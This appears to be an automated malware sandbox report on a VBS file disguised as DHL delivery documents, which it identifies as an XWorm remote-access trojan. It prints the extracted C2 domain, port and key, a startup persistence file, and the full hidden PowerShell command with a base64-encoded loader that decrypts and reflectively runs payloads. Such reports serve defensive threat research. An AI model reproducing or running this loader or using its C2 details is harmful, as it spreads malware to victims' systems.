Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
06/03/2025, 09:33
Static task
static1
Behavioral task
behavioral1
Sample
awb_post_dhl_delivery_documents_06_03_2025_00000000000250.vbs
Resource
win7-20240729-en
General
-
Target
awb_post_dhl_delivery_documents_06_03_2025_00000000000250.vbs
-
Size
72KB
-
MD5
f2a4031c9fcc69f1bc32eb62b35651bb
-
SHA1
b97f66f3c831d887c8e1e3e4ca209784262b5c23
-
SHA256
70459c4985da2c11b2baa8b746c86e4cd031470d1c216b2c13b87763c4485647
-
SHA512
7e50b481b4268f474e5ab387c00221d0b29eea79cfbb7a025ddd6cf01aea397c626478b0af94d4ec6d0631fe65f9b331581511060d61c23474066fd665f6b0e6
-
SSDEEP
1536:bdW0MXa09sT3o202+TpydNFMLSEGgcX4XTA66Mrhrpj:bds9DfTpUcfj9pj
Malware Config
Extracted
xworm
5.0
tripplebanks.duckdns.org:3399
bppouzbV7pFA6n72
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral2/memory/1428-23-0x000001F0A7420000-0x000001F0A7430000-memory.dmp family_xworm -
Xworm family
-
Blocklisted process makes network request 1 IoCs
flow pid Process 31 1428 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 1428 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_aecd54d9.cmd powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_aecd54d9.cmd powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 1428 powershell.exe 1428 powershell.exe 1428 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1428 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1428 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1800 wrote to memory of 228 1800 WScript.exe 86 PID 1800 wrote to memory of 228 1800 WScript.exe 86 PID 228 wrote to memory of 3432 228 cmd.exe 88 PID 228 wrote to memory of 3432 228 cmd.exe 88 PID 3432 wrote to memory of 1428 3432 cmd.exe 90 PID 3432 wrote to memory of 1428 3432 cmd.exe 90
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\awb_post_dhl_delivery_documents_06_03_2025_00000000000250.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1800 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9TGXY.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:228 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\9TGXY.bat"3⤵
- Suspicious use of WriteProcessMemory
PID:3432 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcnBidHkgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHJwYnR5KSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRycGJ0eSIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRycGJ0eSwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcnBidHkiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24ga3dzcmMoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ2E1aElwVlZkMEFLdWNZeWVzMUxmbzcrb0M2NUhJVmZ4aHpGQk9yS0ZBcnc9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3pTdDI5dEpLUVVJNnJGbEUrSGtZOWc9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gc3dxeWsoJHBhcmFtX3Zhcil7CSRxdm5uZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkandlZWQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkZm5vZmw9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgkcXZubmQsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJGZub2ZsLkNvcHlUbygkandlZWQpOwkkZm5vZmwuRGlzcG9zZSgpOwkkcXZubmQuRGlzcG9zZSgpOwkkandlZWQuRGlzcG9zZSgpOwkkandlZWQuVG9BcnJheSgpO31mdW5jdGlvbiByd3FmaigkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHd6b3JtPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCdbLTEuLi00XSAtam9pbiAnJykoW2J5dGVbXV0kcGFyYW1fdmFyKTsJJGtpYnZhPSR3em9ybS5FbnRyeVBvaW50Owkka2lidmEuSW52b2tlKCRudWxsLCAkcGFyYW0yX3Zhcik7fSRob3N0LlVJLlJhd1VJLldpbmRvd1RpdGxlID0gJHJwYnR5OyR1dG53bT1bU3lzdGVtLklPLkZpbGVdOjooJ3R4ZVRsbEFkYWVSJ1stMS4uLTExXSAtam9pbiAnJykoJHJwYnR5KS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkbWZlIGluICR1dG53bSkgewlpZiAoJG1mZS5TdGFydHNXaXRoKCc6OiAnKSkJewkJJHpkZndoPSRtZmUuU3Vic3RyaW5nKDMpOwkJYnJlYWs7CX19JHJqcnNpPVtzdHJpbmdbXV0kemRmd2guU3BsaXQoJ1wnKTskd2pobHg9c3dxeWsgKGt3c3JjIChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHJqcnNpWzBdKSkpOyR1emh5bj1zd3F5ayAoa3dzcmMgKFtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkcmpyc2lbMV0pKSk7cndxZmogJHdqaGx4ICRudWxsO3J3cWZqICR1emh5biAoLFtzdHJpbmdbXV0gKCclKicpKTs=')) | Invoke-Expression"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1428
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
64KB
MD5e97445f2bbbab34630abb7a04469cb45
SHA15b792df1ebd57ce2a8495cbd654a4796f39f40d2
SHA256508d310faa39b95dd9cfd340dd0e40822675b8b80efafce1b8cd56d764bfc431
SHA5127dc0d816065d1f41cb30aff323b3d2c87e02cecfedd97de9f37e4f3a9bf5079b7d0452b100b7e8b7c108abff9c2ec2079b59a023ec2f87d344ffc2e53b1d6165
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82